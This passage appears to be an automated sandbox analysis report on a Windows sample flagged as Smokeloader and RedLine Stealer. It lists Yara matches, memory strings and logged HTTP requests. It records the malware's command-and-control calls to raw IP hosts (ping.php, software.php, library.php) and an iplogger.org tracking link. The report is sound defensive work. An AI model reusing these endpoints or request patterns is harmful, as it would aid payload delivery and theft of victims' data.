Source: file.exe, 00000000.00000003.345054992.0000000003940000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.344736668.0000000003746000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.315966725.00000000031F7000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.349013396.0000000003B83000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.344047493.0000000003935000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.343086335.0000000003B0D000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.315735295.0000000002F6E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.316522296.0000000003248000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.316150109.00000000031F7000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.347627811.000000000374D000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.342413106.0000000003927000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.349485189.000000000374C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.344369058.0000000003B27000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.316216498.0000000002F6E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.316046017.0000000002F6E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.341121429.0000000003749000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.343503756.000000000374B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.346281710.0000000003B4D000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.348412954.000000000396A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.316402159.00000000031F7000.00000004.00000800.00020000.00000000.sdmp, Cleaner.exe, 00000021.00000002.640280019.0000024B00001000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://iplogger.org/1Pz8p7
Source: Cleaner.exe, 00000021.00000002.645456817.0000024B0040E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://iplogger.orgx
Source: Cleaner.exe, 00000021.00000002.640280019.0000024B00001000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://take.rdrct-now.online/go/ZWKA?p78705p298845p1174
Source: unknown DNS traffic detected: queries for: iplogger.org
Source: global traffic HTTP traffic detected: GET /1Pz8p7 HTTP/1.1User-Agent: Mozilla/5.0 (Linux; Android 9; SM-G973U Build/PPR1.180610.011) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Mobile Safari/537.36Host: iplogger.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /powfhxhxcjzx/ping.php?sub=NOSUB&stream=start&substream=mixinte HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 208.67.104.97Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /software.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: DHost: 85.31.46.167Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /software.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: EHost: 85.31.46.167Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /powfhxhxcjzx/ping.php?sub=NOSUB&stream=mixtwo&substream=mixinte HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 208.67.104.97Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /storage/ping.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 0Host: 107.182.129.235Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /storage/extension.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 107.182.129.235Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache
Source: unknown HTTPS traffic detected: 148.251.234.83:443 -> 192.168.2.3:49723 version: TLS 1.2

E-Banking Fraud

barindex
Source: Yara match File source: 0.3.file.exe.2210000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.0.file.exe.710e67.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.0.file.exe.400000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.0.file.exe.710e67.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.0.file.exe.400000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.0.file.exe.400000.11.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.0.file.exe.400000.31.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.0.file.exe.400000.27.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.0.file.exe.710e67.22.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.0.file.exe.710e67.14.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.0.file.exe.710e67.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.0.file.exe.710e67.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.0.file.exe.710e67.28.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.0.file.exe.710e67.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.0.file.exe.710e67.24.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.0.file.exe.710e67.20.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.0.file.exe.400000.13.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.0.file.exe.400000.21.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.0.file.exe.710e67.32.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.0.file.exe.710e67.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.0.file.exe.710e67.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.0.file.exe.710e67.28.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.0.file.exe.400000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.0.file.exe.710e67.32.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.0.file.exe.710e67.20.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.0.file.exe.710e67.26.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.0.file.exe.710e67.26.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.0.file.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.0.file.exe.710e67.12.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.0.file.exe.710e67.24.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.0.file.exe.710e67.14.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.0.file.exe.400000.29.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.0.file.exe.710e67.16.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.0.file.exe.710e67.12.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.0.file.exe.710e67.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.0.file.exe.710e67.30.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.0.file.exe.710e67.18.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.0.file.exe.710e67.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.0.file.exe.710e67.16.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.0.file.exe.400000.19.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.0.file.exe.400000.25.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.0.file.exe.400000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.0.file.exe.710e67.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.0.file.exe.400000.15.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.0.file.exe.710e67.30.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.0.file.exe.710e67.18.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.0.file.exe.400000.17.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.0.file.exe.400000.23.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.file.exe.2210000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.0.file.exe.710e67.22.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000000.261344459.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000000.271765385.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000000.265250551.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000000.306274144.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000000.270474734.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000000.292406498.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000000.299589881.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000000.260586728.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000000.307333691.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000000.285914510.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000000.265875582.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000000.254096635.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000000.255136448.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000000.293499241.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000000.284886919.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000000.299464336.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000000.254427333.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000000.307684554.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000000.260403586.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000000.270306154.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000000.271549614.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000000.261149123.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000000.265067890.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000000.280355467.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000000.300426883.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000000.300281036.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000000.266050637.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000000.293620841.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000000.292559864.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000000.254941692.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000000.306082555.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000000.286093708.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.253262177.0000000002210000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

System Summary

barindex
Source: 00000000.00000000.261344459.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000000.00000000.271765385.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000000.00000000.266126410.000000000078A000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000000.265250551.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000000.00000000.307807767.000000000078A000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000000.272012058.000000000078A000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000000.306274144.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000000.00000000.270474734.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000000.00000000.255218236.000000000078A000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000000.254552831.000000000078A000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000000.299589881.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000000.00000000.260586728.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000000.00000000.300504834.000000000078A000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000000.306335009.000000000078A000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000000.286527423.000000000078A000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000000.255136448.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000000.00000000.284886919.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000000.00000000.254427333.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000000.00000000.307684554.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000000.00000000.261493549.000000000078A000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000000.270666653.000000000078A000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000000.260670257.000000000078A000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000000.293688181.000000000078A000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000000.300426883.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000000.00000000.285114416.000000000078A000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000000.265318606.000000000078A000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000000.266050637.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000000.00000000.293620841.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000000.00000000.292559864.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000000.00000000.299699149.000000000078A000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000000.292621686.000000000078A000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000000.286093708.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: file.exe, 00000000.00000003.348925452.0000000003B6E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: S D S O F T W A R E \ C l a s s e s \ \ C L S I D \ \ \ I P C $ This is a third-party compiled AutoIt script. " r u n a s E r r o r a l l o c a t i n g m e m o r y . S e A s s i g n P r i m a r y T o k e n P r i v i l e g e S e I n c r e a s e Q u o t a P r i v i l e g e S e B a c k u p P r i v i l e g e S e R e s t o r e P r i v i l e g e w i n s t a 0 d e f a u l t w i n s t a 0 \ d e f a u l t C o m b o B o x L i s t B o x | S H E L L D L L _ D e f V i e w l a r g e i c o n s d e t a i l s s m a l l i c o n s l i s t C L A S S C L A S S N N R E G E X P C L A S S I D N A M E X Y W H I N S T A N C E T E X T % s % u % s % d L A S T [ L A S T A C T I V E [ A C T I V E H A N D L E = [ H A N D L E : R E G E X P = [ R E G E X P T I T L E : C L A S S N A M E = [ C L A S S : A L L [ A L L ] H A N D L E R E G E X P T I T L E T I T L E T h u m b n a i l C l a s s A u t o I t 3 G U I C o n t a i n e r
Source: file.exe, 00000000.00000003.348371414.0000000003951000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: S D S O F T W A R E \ C l a s s e s \ \ C L S I D \ \ \ I P C $ This is a third-party compiled AutoIt script. " r u n a s E r r o r a l l o c a t i n g m e m o r y . S e A s s i g n P r i m a r y T o k e n P r i v i l e g e S e I n c r e a s e Q u o t a P r i v i l e g e S e B a c k u p P r i v i l e g e S e R e s t o r e P r i v i l e g e w i n s t a 0 d e f a u l t w i n s t a 0 \ d e f a u l t C o m b o B o x L i s t B o x | S H E L L D L L _ D e f V i e w l a r g e i c o n s d e t a i l s s m a l l i c o n s l i s t C L A S S C L A S S N N R E G E X P C L A S S I D N A M E X Y W H I N S T A N C E T E X T % s % u % s % d L A S T [ L A S T A C T I V E [ A C T I V E H A N D L E = [ H A N D L E : R E G E X P = [ R E G E X P T I T L E : C L A S S N A M E = [ C L A S S : A L L [ A L L ] H A N D L E R E G E X P T I T L E T I T L E T h u m b n a i l C l a s s A u t o I t 3 G U I C o n t a i n e r
Source: soft[1].0.dr String found in binary or memory: S D S O F T W A R E \ C l a s s e s \ \ C L S I D \ \ \ I P C $ This is a third-party compiled AutoIt script. " r u n a s E r r o r a l l o c a t i n g m e m o r y . S e A s s i g n P r i m a r y T o k e n P r i v i l e g e S e I n c r e a s e Q u o t a P r i v i l e g e S e B a c k u p P r i v i l e g e S e R e s t o r e P r i v i l e g e w i n s t a 0 d e f a u l t w i n s t a 0 \ d e f a u l t C o m b o B o x L i s t B o x | S H E L L D L L _ D e f V i e w l a r g e i c o n s d e t a i l s s m a l l i c o n s l i s t C L A S S C L A S S N N R E G E X P C L A S S I D N A M E X Y W H I N S T A N C E T E X T % s % u % s % d L A S T [ L A S T A C T I V E [ A C T I V E H A N D L E = [ H A N D L E : R E G E X P = [ R E G E X P T I T L E : C L A S S N A M E = [ C L A S S : A L L [ A L L ] H A N D L E R E G E X P T I T L E T I T L E T h u m b n a i l C l a s s A u t o I t 3 G U I C o n t a i n e r
Source: file.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 00000000.00000000.261344459.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000000.00000000.271765385.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000000.00000000.266126410.000000000078A000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000000.265250551.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
